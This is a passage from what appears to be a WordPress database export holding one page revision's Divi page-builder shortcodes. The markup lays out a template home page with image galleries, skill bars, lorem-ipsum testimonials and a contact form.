button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Latest Work Section\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" custom_padding=\"110px||5px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Latest Work</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"0px\" admin_label=\"Work Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_padding=\"0px|5%|0px|5%\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-02.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-03.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-05.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-04-1.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Button Section\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" custom_padding=\"0px||90px|\"][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"See More\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Skill Section\" _builder_version=\"3.22\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Skills</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Skill\" _builder_version=\"3.25\" custom_padding=\"20px||10px|\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"flip\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It is a long established fact that a reader. It was popularised in the 1960s with the release.\r[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_counters bar_bg_color=\"#fcd21d\" use_percentages=\"off\" _builder_version=\"3.0.87\" title_font=\"Montserrat|||on|||||\" title_text_color=\"#353740\" title_font_size=\"12px\" title_letter_spacing=\"1px\" title_line_height=\"2em\" percent_font_size=\"1px\" custom_padding=\"|||\" animation_style=\"fold\" animation_direction=\"left\" animation_intensity_fold=\"30%\"][et_pb_counter percent=\"90\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#fcd21d\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Branding - 90%\r[/et_pb_counter][et_pb_counter percent=\"77\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#fcd21d\" use_percentages=\"off\" allow_player_pause_default=\"off\"]UX Research - 77%\r[/et_pb_counter][et_pb_counter percent=\"85%\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#fcd21d\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Interface Design - 85%\r[/et_pb_counter][/et_pb_counters][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Gradient Background Color Section\" _builder_version=\"3.22\" background_color_gradient_direction=\"90deg\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/background-split-03-1.jpg\" custom_margin=\"||78px|\" custom_margin_tablet=\"||0px|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%||0px|\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/MB-purefront-02.png\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"||-56px|\" custom_margin_tablet=\"||10%|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1500ms\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"3.22\" custom_margin=\"40px||50px|\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"3.27.4\" text_text_color=\"#747d88\" text_font_size=\"24px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever.\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"140px\" padding_top_2=\"0px\" padding_left_1=\"10%\" admin_label=\"Feature Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"0px|||\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"100px\" box_shadow_color=\"#ffffff\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_left__hover=\"10%\" padding_top__hover=\"140px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Feature Titile\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"||10px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2>Award winning Design</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p><span>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Maecenas metus sapien, tempus nec lectus vitae, varius porttitor turpis. Ut sit amet tincidunt nulla, nec ultrices est. Aliquam sollicitudin tempor dui, ac accumsan metus vulputate sit amet. Donec placerat rutrum tellus et.</span></p>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Product\" use_icon=\"on\" font_icon=\"%%65%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"3.0.83\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation_style=\"fade\" animation_direction=\"bottom\"][/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Branding\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"3.0.82\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"][/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-06.jpg\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"6%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Testimonial Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Testimonial Title\" _builder_version=\"3.25\" custom_margin=\"|||\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat|on||on|\" text_text_color=\"#353740\" text_font_size=\"42px\" text_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\"]<p>From Our Clients</p>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"600px\" module_alignment=\"center\" custom_margin=\"|||\"]Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Testimonial\" _builder_version=\"3.25\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Mitch Skolnik\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_1.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Andrel Nahaev\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_3.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Eduard Ungureanu\" job_title=\"Tech Support\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_2.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Tom Ewer\" job_title=\"Blogger\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_5.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"3.22\" background_color=\"#fcd21d\" custom_padding=\"110px||110px|\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form captcha=\"off\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"3.23\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Company\" field_title=\"Company Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"3.16\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Home New','','inherit','closed','closed','','564-revision-v1','','','2020-08-07 20:18:10','2020-08-07 